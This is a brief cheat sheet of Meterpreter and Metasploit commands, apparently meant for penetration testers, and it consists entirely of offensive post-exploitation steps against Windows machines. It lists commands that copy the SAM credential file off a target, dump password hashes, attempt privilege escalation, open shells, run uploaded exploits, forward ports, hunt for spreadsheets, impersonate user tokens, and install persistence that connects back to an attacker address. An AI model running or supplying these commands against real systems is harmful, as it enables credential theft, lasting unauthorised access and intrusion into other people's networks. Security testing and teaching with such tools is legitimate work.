Useful commands with Meterpreter:
Meterpreter upload file to Windows target:
meterpreter> upload file c:\\windows
Meterpreter download file from Windows target:
meterpreter> download c:\\windows\\repair\\sam /tmp
Meterpreter run .exe on target – handy for executing uploaded exploits:
meterpreter> execute -f c:\\windows\\temp\\exploit.exe
Creates new channel with cmd shell:
meterpreter> execute -f cmd -c
Meterpreter show processes:
meterpreter> ps
Meterpreter get shell on the target:
meterpreter> shell
Meterpreter attempts priviledge escalation the target:
meterpreter> getsystem
Meterpreter attempts to dump the hashes on the target:
meterpreter> hashdump
meterpreter> credcollect
Meterpreter create port forward to target machine:
meterpreter> portfwd add –l 3389 –p 3389 –r $IP
Meterpreter delete port forward:
meterpreter> portfwd delete –l 3389 –p 3389 –r $IP
Search excel files on target machine:
meterpreter> search -f *.xlsx
Get user id:
meterpreter> getuid
Check whether arch == meterpreter or migrate to x64 process!!
meterpreter> sysinfo
Identify other machines that the supplied domain user has administrative access to
msf> run post/windows/gather/local_admin_search_enum
msf> connect $TARGET $PORT
Uses SSL:
msf> connect -s $TARGET $PORT
Starts ruby shell:
msf> irb
Integrations with other tools:
msf> load pcap, wmap, nessus
msf> db_hosts
msf> db_vulns
msf> db_exploited
Meterpreter persistence mode
meterpreter> run persistence -U -i 5 -p 443 -r $IP
Impersonate any user
meterpreter> use incognito meterpreter> list_tokens -u meterpreter> impersonate_token MACHINE\\user meterpreter> drop_token
